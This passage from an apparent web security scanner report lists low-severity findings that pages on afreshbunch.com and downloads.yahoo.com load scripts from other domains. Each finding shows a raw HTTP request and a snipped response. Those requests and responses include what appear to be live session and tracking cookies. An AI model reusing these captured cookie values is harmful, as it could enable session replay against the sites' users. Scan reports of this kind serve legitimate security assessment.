VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3896
Date: Tue, 26 Apr 2011 14:21:07 GMT

_289667_amg_acamp_id=166308;
_289667_amg_pcamp_id=69114;
_289667_amg_location_id=55367;
_289667_amg_creative_id=289667;
_289667_amg_loaded=true;
var _amg_289667_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732015/direct/01/rnd=1351645398?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUwaPB564QcxR6ewY9H0HZ0fikYa5nZW8sdXNhLHQsMTMwMzgyNzY2ODI1OSxjLDI4OTY2NyxwYyw2OTExNCxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY3LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1BRclhvM0E5REVBOUN0ZWpjRDBNUUJMYWNpN0ZsUUJBcEhBOUN0Y2pFMENrY0QwSzF5TVRRRlVjT2FLYWhEdGRTc1lkYTZiMnppWEoxTFpOQUFBQUFFUXdBQUMxQUFBQWxnSUFBQUlBQUFERXBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFIZ0FXQUpoREUwQUFnMEJBZ1VDQUFRQUFBQUFseDhMS2dBQUFBQS4vY25kPSF1QTU2WkFpUW1RTVF4TWtLR0FBZzBjY0JLRTB4TXpNekVkY2pFMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQlk0UmhnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWwvY2xpY2tlbmM9aHR0cDovL2dvb2dsZWFkcy5nLmRvdWJsZWNsaWNrLm5ldC9hY2xrP3NhPWwmYWk9Qk9ualR5ZFMyVGZHS0VjaTFzUWZSNnFXSkFkZnEtTk1CcDUtVTdCanJ3dTNVSEFBUUFSZ0JJQUE0QVZDQXgtSEVCR0RKN29PSThLUHNFb0lCRjJOaExYQjFZaTAxTWpVek9EQTVORE13T1RRd05ERXdvQUhEOHYzc0E3SUJFSGQzZHk1emNHRnRiR0YzY3k1amIyMjZBUW94TWpCNE5qQXdYMkZ6eUFFSjJnRXBhSFIwY0RvdkwzZDNkeTV6Y0dGdGJHRjNjeTVqYjIwdmMzQmhiUzFpYkc5amEyVnlMbWgwYld5WUFzb2J3QUlFeUFLRjBzOEtxQU1CNkFPNkF1Z0RpZ1AxQXdBQUFNU0FCcnFraGY3SzlxV25UdyZudW09MSZzaWc9QUdpV3F0eWV5NkltTzFlT3B1LU1VT29HMnRnbW9aOVZQZyZjbGllbnQ9Y2EtcHViLTUyNTM4MDk0MzA5NDA0MTAmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69114&c5=166308&c6=&cv=1.3&cj=1&rn=1715867565" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

21.3. http://afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.10.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:05:01 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:06:00 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</title>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...
</div>
                   <script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf"></script>
...[SNIP]...

21.4. http://afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.6.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38736
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:16 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:16 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</title>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...
<!-- begin Genbook badge -->
<script src="http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId=1000"></script>
...[SNIP]...

21.5. http://afreshbunch.com/about.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /about.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about.htm HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.5.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 23126
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:09 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; path=/
Set-Cookie: ASPSESSIONIDSSTDDTRS=ICCEHBADCBLIPHIBGONINFAE; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:09 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</title>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...

21.6. http://afreshbunch.com/forums/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14353
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:26 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
</title>

<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...

21.7. http://afreshbunch.com/forums/images/x.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/images/x.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/images/x.gif HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.8.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 25511
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:36 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:36 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
</title>

<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...

21.8. http://downloads.yahoo.com/freeware  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /freeware

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /freeware HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=ciGdOSjH5xepaEAZS7QpAXfv98cK6F6KOcKtFsBL.zOIPQE4N3EHjPIjz9Ry0.pA_mhV2n7Jk1hw5pekH26vxKFtU5TRQQAma.hL037jgYa2PTX1V1toVMBQkwW0dgg4DfLPDcclwS0d8ZIiLUS.dMq6ZSeg6uvseIjSVaAzLU0vfSpRvMWxH3gKjA0C54a3RHQpbUeTZGL.yJk2WBR1MFBu8yCip521Ptzsm3Z3mlh3zMyVSofOpA.FJ1kwjgCkS1.NbzkgfKrwT2snB9ZepFddS4yfxXfIfiHs2KuE5RpdCYPYEjZWj4_uTK0IIeFNkv4kq82BDTkvDFePKHRvIjb9FO9fe1TrqhEzPiHz4Ap7wCfx0gOIInDXzvX_fNtQ66cXT7EGRJj4MJTsvQnxVuKHG3ztG8Lw3MufNM2i3lGi9VFA; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 141230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...
<meta name="title" content="Free Software Download Shareware Freeware - Downloads.Yahoo.com" />
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&amp;2.8.1/build/carousel/carousel-min.js&amp;2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.8.1/build/animation/animation-min.js&amp;2.8.1/build/container/container_core-min.js&amp;2.8.1/build/selector/selector-min.js&amp;2.8.1/build/button/button-min.js&amp;2.8.1/build/menu/menu-min.js&amp;2.8.1/build/element/element-min.js&amp;2.8.1/build/container/container-min.js"></script>
<script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...

21.9. http://downloads.yahoo.com/linux  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /linux

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /linux HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.4.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=EJrvAC_B5xevrWgM3QJ9810zR4MY0ALwmL67RvYl4ACCDjj91C5QOzAKojsZVGh5deEI1hSA5VaAJUGx17h82kxoBREydbHnor1ILXmEa8wQ5wzN4VHUV6V83C2a4vsDlIosvXogdOWwmx_MnZKukNzYDLWMg3cz66FITnSnPasy1PL_qQgGs9MMdNFdMWD3boAma3XgVE4SSncKTsuYqyQkIpbMi0sZwzc3YWz07HQaL46euEfKCnnb3Vp2oCFQ5OhdtsKrJrpYOwni9u.OO4JPbknkKFpXwZGfRKqX89yug3H5GXRn_bVK1PCeOhc9M77MfjEAXiw3Y.bA7l1DQPwqaOuGRgNhxArHn7_uk._qc8vt2PpgQbMH0c51CO5tYMJBZNSpchj9e2AdYWohceMZKPxW4fzLDSBVQDqvHJZtbvVVR0TXENX_l0xFuFKDiVkkWI9_gMeWuGenxxyVzA--; expires=Thu, 26-Apr-2012 13:56:13 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 142705

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...
<meta name="title" content="Free Software Download Shareware Freeware - Downloads.Yahoo.com" />
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&amp;2.8.1/build/carousel/carousel-min.js&amp;2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.8.1/build/animation/animation-min.js&amp;2.8.1/build/container/container_core-min.js&amp;2.8.1/build/selector/selector-min.js&amp;2.8.1/build/button/button-min.js&amp;2.8.1/build/menu/menu-min.js&amp;2.8.1/build/element/element-min.js&amp;2.8.1/build/container/container-min.js"></script>
<script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...

21.10. http://downloads.yahoo.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; __utmz=143065248.1303826118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=143065248.1215139530.1303826118.1303826118.1303826118.1; __utmc=143065248; __utmb=143065248.2.10.1303826118

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:56:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: ysf=ofsOP8_H5xf895sWJTCd9NPX2WiBuAc7uOvkNKmiqCXeWEXt.5JJWgRWZ9jRCPYcB.3vOD1FfeTkx2jdWqUGZbqFFXzykG6SA7UxMAU82b.01IZHxh0tUWHBSA3n08efIw5qaM.ffg_vbq43qjMIBnKcfstPxGYOZcSggnL9TxHDcjJ99GtFQgcbtUEKHZ1fkIYxEusvCPp5bZI2.hOew2fKIIGI7w3CfeReG2Xu0Jmwi2fC.YchFzGWPWI_5nw6.BAzmBaXNJzz1bTr_DCy3SBGCT2DMn5D9G5JqZo4Bk6fX3Zs8Ojdpl3j7hTM5FYBdvx0VLNcFZIlOk3YrQseMxae8MRhopUnUtatVlbI4Cw5uUpj9CdikjKLeE..9R.KaGNmB9SQK_ZHdck_Ehxl_u7ZgNaW3APHvrcnb6Mx.gKKcB2XDQ2zCgx9JqmWKlWIWQC0YYBolBMwV8OqqN_iTuqnQw--; expires=Thu, 26-Apr-2012 13:56:11 GMT; path=/; domain=.yahoo.com; secure; httponly
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 178981

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<META name="y_key" content="f760cc789e48a3df" />
<META name="google-site-verificati
...[SNIP]...
<meta name="title" content="Free Software Download Shareware Freeware - Downloads.Yahoo.com" />
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&amp;2.8.1/build/carousel/carousel-min.js&amp;2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&amp;2.8.1/build/animation/animation-min.js&amp;2.8.1/build/container/container_core-min.js&amp;2.8.1/build/selector/selector-min.js&amp;2.8.1/build/button/button-min.js&amp;2.8.1/build/menu/menu-min.js&amp;2.8.1/build/element/element-min.js&amp;2.8.1/build/container/container-min.js"></script>
<script type="text/javascript" src="http://p.yimg.com/dp/dyc/js/downloads_min_0.0.9.js"></script>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...

21.11. http://downloads.yahoo.com/windows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://downloads.yahoo.com
Path:   /windows

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /windows HTTP/1.1
Host: downloads.yahoo.com
Proxy-Connection: keep-alive
